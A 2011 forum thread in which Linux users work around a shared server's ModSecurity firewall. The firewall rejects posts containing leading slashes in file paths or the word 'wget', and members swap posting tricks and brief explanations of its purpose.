Page 1 of 1

Post a message with a leading slash

Posted: Sat Jan 01, 2011 12:28 pm
by richb
Edit: This issue has been resolved. You may now post slashes normally. However wget

Code: Select all

[b]w[/b]get
still requires code tags around the w.

Re: Post a message with a standalone or leading slash

Posted: Sat Jan 01, 2011 12:40 pm
by Jerry3904
test, part 1

giving up...

Re: Post a message with a standalone or leading slash

Posted: Sat Jan 01, 2011 12:42 pm
by richb
richb wrote:/
apparently it has been fixed?

EDIT: No still a problem.

Re: Post a message with a standalone or leading slash

Posted: Sat Jan 01, 2011 12:44 pm
by Jerry3904
/ etc/grub

no, still rejected if slash is part of a correct directory address

Re: Post a message with a standalone or leading slash

Posted: Sat Jan 01, 2011 1:00 pm
by Eadwine Rose
/etc/boot

Seems to be working correctly here

used:

Code: Select all

[b]/[/b]etc/boot

Re: Post a message with a standalone or leading slash

Posted: Sat Jan 01, 2011 1:29 pm
by Jerry3904
But try it without the tags, which is what I think Rich was talking about

Re: Post a message with a standalone or leading slash

Posted: Sat Jan 01, 2011 1:40 pm
by richb
Jerry3904 wrote:But try it without the tags, which is what I think Rich was talking about
Yes.

Re: Post a message with a standalone or leading slash

Posted: Sat Jan 01, 2011 1:48 pm
by DBeckett
Trying it here /etc/fstab

Oops. Didn't mean to really post that.

Re: Post a message with a standalone or leading slash

Posted: Sat Jan 01, 2011 1:59 pm
by Eadwine Rose
I get this when I try:


Method Not Implemented

GET to /posting.php not supported.

Additionally, a 500 Internal Server Error error was encountered while trying to use an ErrorDocument to handle the request.

Re: Post a message with a standalone or leading slash

Posted: Sat Jan 01, 2011 2:02 pm
by richb
Eadwine Rose wrote:I get this when I try:


Method Not Implemented

GET to /posting.php not supported.

Additionally, a 500 Internal Server Error error was encountered while trying to use an ErrorDocument to handle the request.
That is correct. You need the code tags.

Re: Post a message with a standalone or leading slash

Posted: Sat Jan 01, 2011 5:02 pm
by GoManutd
bit scary if you're getting a method not implemented for posting something with a slash...

seems like it's trying to execute some sort of macro.

of course, many web based apps that handle user input will prevent slashes and other evil sql characters, or will require that they be properly escaped to prevent sql injection attacks.

don't see this as an issue, rather a security feature

Re: Post a message with a standalone or leading slash

Posted: Mon Jan 03, 2011 3:38 am
by m_pav
It doesn't accept leading forward slashes when they're wrapped up in code tags either and this forum rejects regular text files too.

Mike P

Re: Post a message with a standalone or leading slash

Posted: Mon Jan 03, 2011 4:41 am
by richb
m_pav wrote:It doesn't accept leading forward slashes when they're wrapped up in code tags either and this forum rejects regular text files too.

Mike P
/etc/boot

It accepts slashes with code tags. Do you mean text files as attachments?

Re: Post a message with a standalone or leading slash

Posted: Mon Jan 03, 2011 2:41 pm
by m_pav
Yes to the text files as attachments, it refuses them and actual code tags as in pasted code, not formatting code tags.

Code: Select all

[b]/[/b]etc/X11/xorg.conf
In the above example, the path to xorg.conf is wrapped in code tags, but that brings up the error, so I had to add formatting tags within the code tags for it to work, but the result is sloppy. The issue does not stop with that either. I tried all manner of things like the top left key on a US keyboard, which worked as a carriage return, yet allowed the forward slash
`/etc, so my thoughts are leading towards this forums back end trying to interpret / as bbcode outside of the [] square brackets

The following seems to support my theory, as hijack is not bbcode, yet it is accepted.
[hijack]
What would be nice is to see a list of permitted attachments and size limitations when adding an attachment
[/hijack]

Mike P

Re: Post a message with a standalone or leading slash

Posted: Mon Jan 03, 2011 3:09 pm
by richb
m_pav wrote:Yes to the text files as attachments, it refuses them and actual code tags as in pasted code, not formatting code tags.

Code: Select all

[b]/[/b]etc/X11/xorg.conf
In the above example, the path to xorg.conf is wrapped in code tags, but that brings up the error, so I had to add formatting tags within the code tags for it to work, but the result is sloppy. The issue does not stop with that either. I tried all manner of things like the top left key on a US keyboard, which worked as a carriage return, yet allowed the forward slash
`/etc, so my thoughts are leading towards this forums back end trying to interpret / as bbcode outside of the [] square brackets

The following seems to support my theory, as hijack is not bbcode, yet it is accepted.
[hijack]
What would be nice is to see a list of permitted attachments and size limitations when adding an attachment
[/hijack]

Mike P
I have enabled text file attachments.
I only wrap the slash with code tags, to make it post, not the whole path. It posts every time for me.

And Karen has a ticket in to fix it on the server. Please be patient.

EDIT: We are looking into adding that info real time, but it may be difficult. In the interim, I have posted the information in the How-To forum.
EDIT2:The How-To will have to do. Implementing file attachment information when adding an attachment is is very difficult for technical reasons. Perhaps in a future version of phpBB it will be added by the developers.

Re: Post a message with a standalone or leading slash

Posted: Wed Jan 26, 2011 3:32 pm
by wireman
Problem is this looks really ugly when trying to quote contents of files within a code block. Anyone know how get code blocks to show leading '/' correctly without have to put something around it...?

e.g. this looks very bad:

Code: Select all

[i]/[/i]etc/fstab

Re: Post a message with a standalone or leading slash

Posted: Wed Jan 26, 2011 3:35 pm
by richb
wireman wrote:Problem is this looks really ugly when trying to quote contents of files within a code block. Anyone know how get code blocks to show leading '/' correctly without have to put something around it...?

e.g. this looks very bad:

Code: Select all

[i]/[/i]etc/fstab
Currently there is no way that I know of. That is what we are trying to fix with the server people.

Re: Post a message with a standalone or leading slash

Posted: Wed Jan 26, 2011 4:08 pm
by wireman
Currently there is no way that I know of. That is what we are trying to fix with the server people.
OK. Here's hoping you get a solution.

Re: Post a message with a standalone or leading slash

Posted: Wed Jan 26, 2011 5:48 pm
by lucky9
/home/user/ should work also. And I think it looks better.

PS: I got another server error when originally posting this post.

Re: Post a message with a standalone or leading slash

Posted: Wed Jan 26, 2011 6:24 pm
by GoManutd
i've found the source of the error. it's a security feature that needs to be tweaked. it is not forum software related.

Re: Post a message with a leading slash

Posted: Wed Feb 23, 2011 10:40 am
by cookdav
Hmmm...this problem is 'messy'. I've got a reply (that I've saved), and no matter what I try,
I can't see to find any way to NOT get this 'method not implemented' error when I try
to view/post it.

Maybe I'm misunderstanding the 'rules'?

My prospective post has some normal forward-slashed directory and file references, in 2 or 3
places. So, I need the tags around the just the first slash, in each occurrence? And, even
when that occurrence is already within 'quoted-string' tags?

[I'm about ready to just give up, and not make the post.]

Is this 'problem' something that is or will-be worked on and fixed? Or, do we all need to now
learn this new method of posting and replying?

Re: Post a message with a leading slash

Posted: Wed Feb 23, 2011 10:43 am
by Adrian
The problem was solved as far as I know, look /etc/apt/sources.list You might have found another security "feature", maybe you have wget in the code?
Try to post (preview) part of what you post and detect where the problem is.

Re: Post a message with a leading slash

Posted: Wed Feb 23, 2011 10:50 am
by richb
Yes, the slash issue was corrected for this forum and the wiki, and you are able to post normally. If it is a wget we still have that problem. If you put the bold tags around the w only it should post.
wget

Code: Select all

[b]w[/b]get

Re: Post a message with a leading slash

Posted: Wed Feb 23, 2011 11:50 am
by GoManutd
wouldn't necessarily call it a problem, rather it's a security check that prevents hacker from downloading stuff from the server and/or using our servers to download stuff from elsewhere on the net.

the slash checking rule was modified, but modifying the rule for wget is a bit trickier because it can pose wider issues when checking for server side application names.

Re: Post a message with a leading slash

Posted: Wed Feb 23, 2011 1:29 pm
by richb
GoManutd wrote:wouldn't necessarily call it a problem, rather it's a security check that prevents hacker from downloading stuff from the server and/or using our servers to download stuff from elsewhere on the net.

the slash checking rule was modified, but modifying the rule for wget is a bit trickier because it can pose wider issues when checking for server side application names.
Thank you for the excellent clarification.

Re: Post a message with a leading slash

Posted: Wed Feb 23, 2011 1:58 pm
by cookdav
richb wrote:
GoManutd wrote:wouldn't necessarily call it a problem, rather it's a security check that prevents hacker from downloading stuff from the server and/or using our servers to download stuff from elsewhere on the net.

the slash checking rule was modified, but modifying the rule for wget is a bit trickier because it can pose wider issues when checking for server side application names.
Thank you for the excellent clarification.
Not sure I follow why that it's a 'security check'. Did we have such limitation/issue in the other forums? Seems to me,
it's a bug or unnecessary side-effect from sloppy coding somewhere in this new 'phpBB' system!?

No, there's no 'wget' in my prospective failing post.

[That said, once I solve this, the issue should go away (for me, at least). So, I will keep working at figuring
out where the problem is.]

Re: Post a message with a leading slash

Posted: Wed Feb 23, 2011 2:16 pm
by richb
cookdav wrote:
richb wrote:
GoManutd wrote:wouldn't necessarily call it a problem, rather it's a security check that prevents hacker from downloading stuff from the server and/or using our servers to download stuff from elsewhere on the net.

the slash checking rule was modified, but modifying the rule for wget is a bit trickier because it can pose wider issues when checking for server side application names.
Thank you for the excellent clarification.
Not sure I follow why that it's a 'security check'. Did we have such limitation/issue in the other forums? Seems to me,
it's a bug or unnecessary side-effect from sloppy coding somewhere in this new 'phpBB' system!?

No, there's no 'wget' in my prospective failing post.

[That said, once I solve this, the issue should go away (for me, at least). So, I will keep working at figuring
out where the problem is.]
It is not the phpBB software, nor is it any coding sloppiness. It is the server we are on that has the security feature deliberately put in place. It is a different server than ML was on, and it is a shared server. The security features have been implemented by the person we share with. GoManutd has helped with the server questions and can give a far better explanation than I can.

If you like you can send me the post on my private email. If you PM me I will give you my email address.

Re: Post a message with a leading slash

Posted: Wed Feb 23, 2011 2:21 pm
by GoManutd
it's an awesome piece of software called modsecurity. it's essentially a web application firewall - instead of sniffing packets it looks at payloads.

what it helps prevent are things like sql injection attacks, well known attacks, as well as providing a level of protection against unknown/undocumented attacks.

so things like sending a payload to an app that the sql server would execute and, say, turn around and send back /etc/passwd

it really is a required piece of software for any web server, as web applications become increasingly complex and interact with other web services that may, or may not be under the same "roof".

Re: Post a message with a leading slash

Posted: Wed Feb 23, 2011 7:48 pm
by cookdav
Oops...yes, there IS a w-get, which was the cause of my grief.

[Putting tags around the w wasn't quite the total answer, because then those tags don't dissappear
when you view it, if the w-get is within a larger 'code' tagged sequence, so I had to eliminate the code tags.]

Re: Post a message with a leading slash

Posted: Wed Feb 23, 2011 7:56 pm
by richb
cookdav wrote:Oops...yes, there IS a w-get, which was the cause of my grief.

[Putting tags around the w wasn't quite the right answer, because then those tags don't dissappear
when you view it, if the w-get is within a larger 'code' tagged sequence, so I had to eliminate the code tags.]
Correct. In a regular posting they will make the w appear bold, In code they show as the tags. Which is as expected since code is exactly that, and will show any code tags. Sorry that was a bit redundant, but I could not find another way to express it.

Re: Post a message with a leading slash

Posted: Wed Feb 23, 2011 9:33 pm
by GoManutd
improving the regular expressions that, when a match is found, trigger events is still on the list to research.

ideally, using code tags for something that is, essentially code and not have to use bold on single letters is what is being aimed for. but right now, i have regenerative biology and advanced microbio - doesn't leave much spare brain computation time in my already aged synapses...